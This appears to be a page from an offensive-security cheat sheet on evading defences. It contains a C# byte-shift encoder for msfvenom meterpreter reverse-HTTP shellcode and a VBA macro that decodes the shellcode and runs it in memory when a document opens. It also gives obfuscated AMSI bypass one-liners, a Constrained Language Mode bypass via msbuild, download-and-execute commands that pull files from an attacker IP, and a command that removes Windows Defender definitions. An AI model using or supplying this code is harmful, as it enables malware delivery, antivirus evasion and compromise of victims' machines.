Bypass All The Things

Encode payload with Byte Shifting

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;

namespace EncryptVBA
{
        class Program
        {
            static void Main(string[] args)
            {
            // byte[] buff = ... from msfvenom command, just paste 
            
            // HERE
            
            // msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.45.173 LPORT=8080 -f csharp
            // -----
            byte[] encoded = new byte[buf.Length];
                for (int i = 0; i < buf.Length; i++)
                {
                    encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
                }
                uint counter = 0;
                StringBuilder hex = new StringBuilder(encoded.Length * 2);
                foreach (byte b in encoded)
                {
                    hex.AppendFormat("{0:D},", b);
                    counter++;
                    if (counter % 50 == 0)
                    {
                        hex.AppendFormat(" _{0}", Environment.NewLine);
                    }
                }

                Console.WriteLine("The payload is: " + hex.ToString());
            }
        }
    }

for quick compiling using C# use csc.exe:

c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe z:\encodepayload.cs

VBA Script decode payload with Byte Shifting

make sure you have this "(space)_" in the end of line in your shellcode array:

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Sub MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long


buf = Array(EncodedPayloadPasteHere)
For i = 0 To UBound(buf)
 buf(i) = buf(i) - 2
Next i
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub


Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub

AMSI Bypass

always works.

SeT-Item ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varIABLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."AssEmbly"."GETTYPe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."getfiElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sETVaLUE"(  ${nULl},${tRuE} )

more advanced

SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]("{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ))."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )

sometimes problem with CLM

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

CLM Bypass

CLM is refering to Constrained Language Mode.

Check with this:

$ExecutionContext.SessionState.LanguageMode

# ConstrainedLanguage (this is bad for running powershell script)
# FullLanguage (this is good for us)

Download this file, and upload it into the windows victim machine

curl http://192.168.x.x/FullBypass.csproj -o C:\Windows\Tasks\FullBypass.csproj

Then run this command

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe .\FullBypass.csproj

Run directly in the Memory

IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

Disable Windows Defender

Require Local Admin and need to execute as impacket-psexec or psexec.exe

impacket-psexec needs smb service / port 445

"C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

More Reference

PreviousPhishing PayloadNextExploit

Last updated